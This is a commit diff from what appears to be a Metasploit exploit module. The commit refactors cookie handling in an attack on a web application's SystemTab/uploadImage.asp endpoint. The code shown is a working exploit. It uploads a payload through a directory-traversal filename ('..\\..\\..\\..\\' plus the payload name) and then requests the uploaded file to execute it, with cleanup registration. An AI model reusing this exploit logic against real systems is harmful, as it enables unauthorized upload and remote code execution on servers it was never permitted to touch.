Use res.get_cookies instead of homebrew parse. Use _cgi
parent
bb0753fcdd
commit
d1e4975f76
|
@ -53,21 +53,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
return Exploit::CheckCode::Appears
|
||||
end
|
||||
|
||||
def get_cookie
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri("SystemTab", "uploadImage.asp")
|
||||
})
|
||||
|
||||
if res and res.headers['Set-Cookie']
|
||||
cookie = res.headers['Set-Cookie'].scan(/(\w+\=\w+); path\=.+$/).flatten[0]
|
||||
else
|
||||
fail_with(Failure::Unknown, "#{@peer} - No cookie found, will not continue")
|
||||
end
|
||||
|
||||
cookie
|
||||
end
|
||||
|
||||
def exploit
|
||||
peer = "#{rhost}:#{rport}"
|
||||
|
||||
|
@ -80,8 +65,14 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
data = post_data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
|
||||
|
||||
cookie = get_cookie
|
||||
res = send_request_raw({
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri("SystemTab", "uploadImage.asp")
|
||||
})
|
||||
|
||||
cookie = res.get_cookies
|
||||
|
||||
res = send_request_cgi({
|
||||
"method" => "POST",
|
||||
"uri" => normalize_uri("SystemTab","uploadImage.asp?filename=..\\..\\..\\..\\#{@payload_name}"),
|
||||
"data" => data,
|
||||
|
@ -89,12 +80,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
"cookie" => cookie
|
||||
})
|
||||
|
||||
register_files_for_cleanup(@payload_name)
|
||||
|
||||
if not res or res.code != 200
|
||||
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
|
||||
end
|
||||
|
||||
register_files_for_cleanup(@payload_name)
|
||||
|
||||
print_status("#{peer} - Executing payload #{@payload_name}")
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(@payload_name),
|
||||
|
|
Loading…
Reference in New Issue